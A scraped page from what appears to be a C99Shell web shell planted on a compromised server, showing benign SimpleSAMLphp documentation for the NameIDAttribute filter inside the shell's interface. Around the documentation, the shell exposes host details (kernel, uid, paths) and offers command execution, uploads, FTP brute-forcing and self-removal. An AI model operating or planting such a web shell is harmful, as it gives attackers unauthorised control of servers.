!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/php/3ros/simplesamlphp/modules/saml/docs/   drwxr-xr-x
Free 13.99 GB of 61.93 GB (22.6%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     nameidattribute.txt (1.71 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
`saml:NameIDAttribute`
======================

Filter that extracts the NameID we received in the authentication response and adds it as an attribute.

Parameters
----------

`attribute`
:   The name of the attribute we should create.
    The default is `nameid`.

`format`
:   The format string for the attribute.
    The default is `%I!%S!%V`.

:   The format string accepts the following replacements:

    * `%I`: The IdP that issued the NameID.
            This will be the `NameQualifier` element of the NameID if it is present, or the entity ID of the IdP we received the response from if not.
    * `%S`: The SP the NameID was issued to.
            This will be the `SPNameQualifier` element of the NameID if it is present, or the entity ID of this SP otherwise.
    * `%V`: The value of the NameID.
    * `%F`: The format of the NameID.
    * `%%`: Will be replaced with a single `%`.

Examples
--------

Minimal configuration:

    'default-sp' => array(
        'saml:SP',
        'authproc' => array(
            20 => 'saml:NameIDAttribute',
        ),
    ),

Custom attribute name:

    'default-sp' => array(
        'saml:SP',
        'authproc' => array(
            20 => array(
                'class' => 'saml:NameIDAttribute',
                'attribute' => 'someattributename',
            ),
        ),
    ),

Only extract the value of the NameID.

    'default-sp' => array(
        'saml:SP',
        'authproc' => array(
            20 => array(
                'class' => 'saml:NameIDAttribute',
                'format' => '%V',
            ),
        ),
    ),

See also
--------

 * [The description of the `saml:SP` authentication source.](./saml:sp)
 * [How to generate various NameIDs on the IdP.](./saml:nameid)

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.9507 ]--